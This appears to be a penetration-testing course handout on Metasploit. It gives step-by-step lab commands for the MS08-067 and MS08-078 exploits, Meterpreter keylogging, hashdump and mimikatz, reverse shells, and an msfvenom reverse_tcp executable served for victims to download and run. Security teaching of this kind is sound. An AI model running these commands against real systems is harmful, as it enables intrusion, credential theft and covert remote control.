Ch 4: Metasploit

Following Chapter 4 of Georgia Weidman's Penetration Testing book.

Why Use Metasploit?

Ease of use
Trusted base of exploit code--not all attack code is safe to use

Starting Metasploit

Three Commands

First command starts PostgreSQL, a database. You don't need it for basic Metasploit functions, but with the database you can save scans.

The second command differs from the textbook, because Kali 2 has a different version of Metasploit than was in Kali 1.

Third command starts one of the interfaces for using Metasploit.

service postgresql start msfdb init msfconsole

Help

help help route

Finding Metasploit Modules

Online Search

http://www.rapid7.com/db/modules/

MS08-067 is a famous Windows vuln, very powerful. Patched in 2008, but many systems remain vulnerable.

You can search for modules by

CVE number
OSVDB ID
Bugtraq ID
Microsoft Security Bulletin ID
Any string in the text

Search for MS08-067 -- notice that MS08-67 does not work.

Note the Module Name in the lower left of the image below.

Local Search

search ms08-067 info exploit/windows/smb/ms08_067_netapi

Note these items:

Descriptive Name
Module name
Platform identifies the target systems
Privileged tells us whether the module requires or grants high privileges on the target
Rank potential impact on the target, from "manual" to "excellent" (never crashes a service). "Great" automatically detects the correct target and is likely to succeed.

Note these items:

Basic options available options to customize the attack. Options that are required, but have no default value, such as RHOST in the image below, must be set by the user before running the exploit.
Payload information helps Metasploit decide which payloads it can use with this exploit.

Details about these fields are at

https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit

Using an Exploit

use windows/smb/ms08_067_netapi

Setting Module Options

Show Options

show options

Attack Server 2008 Machine

set RHOST 192.168.119.129 show options

Default values are OK for the other options.

Payloads (or Shellcode)

We need to tell Metasploit what we want to do to the target.

Show Payloads

Shows only payloads compatible with the current exploit

show payloads

Using Default Payload

If you don't choose one, Metasploit will sometimes choose a good default. For Linux targets, it's usually linux/x86/meterpreter/reverse_tcp

exploit

This attack won't work on Windows Server 2008.

However, searching the Metasploit online database for "Windows 2008" finds this one:

MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption

http://www.rapid7.com/db/modules/exploit/windows/browser/ms08_078_xml_corruption

use exploit/windows/browser/ms08_078_xml_corruption show options exploit

On Windows 2008 target system, open IE and open the page shown by Metasploit, as highlighted below:

Using Meterpreter

sessions shows open sessions

sessions -i 1 starts interaction with session 1

help shows Meterpreter commands

sessions sessions -i 1 help

Migrating to Another Process

List processes with ps and find a good process to migrate to, so you'll retain control even if the user closes the browser.

"explorer" is a good process to use. You'll need its Process ID, which was 2176 when I did it. but will be different on your system.

ps ps | grep exp migrate 2176

Gathering Information

sysinfo keyscan_start keyscan_dump screenshot hashdump getuid getsystem load mimikatz kerberos

Exiting from Meterpreter

exit sessions

Types of Shells

Bind Shells

Starts a process listening on the target, on a specified port such as 4444.

Will fail if the server is behind a firewall that blocks unused ports, which is usually the case.

Reverse Shells

Target makes an outgoing connection to the attacker. Much more likely to succeed than a bind shell, especially if the attacker's port is a common one like 80 or 443.

Setting a Payload Manually

Reverse TCP

set payload windows/shell_reverse_tcp show options ifconfig exploit

This exploit has two network configurations: one for the module (the Web server delivering the exploit), and one for the reverse shell payload. All of them have reasonable default values.

In my case, port 4444 was busy and I had to move to another port.

sessions sessions -i 2 exit exit

Msfcli is Gone

Msfcli was deprecated, replaced by "msfconsole -q -x".

Its purpose is to run an exploit from a single line of code, so it's easier to test and script exploits.

MS08-078 One-Liner

msfconsole -q -x "use exploit/windows/browser/ms08_078_xml_corruption; exploit" sessions sessions -i 1 exit exit

A more detailed example is here:

https://www.offensive-security.com/metasploit-unleashed/shell/

Creating Standalone Payloads with Msfvenom

Getting Help

Msfvenom replaces the older msfpayload and msfencode commands.

msfvenom -h

Choosing a Payload

msfvenom -l payloads msfvenom -l payloads | grep windows | grep meterpreter | grep reverse

Setting Options

The --payload-options switch shows the options, not "-o" as in the textbook.

msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Choosing an Output Format

msfvenom --help-formats msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe cp fun.exe /var/www/html service apache2 start

Using the Multi/Handler Module

We need to run a server for the target to connect to.

msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp show options ifconfig set LHOST 192.168.119.130 exploit

On target system, download http://192.168.119.130/fun.exe and run it.

Auxiliary Modules

Scanner HTTP Auxiliary Modules

https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/

Auxiliary Module Reference

https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference/

Revised 9-14-17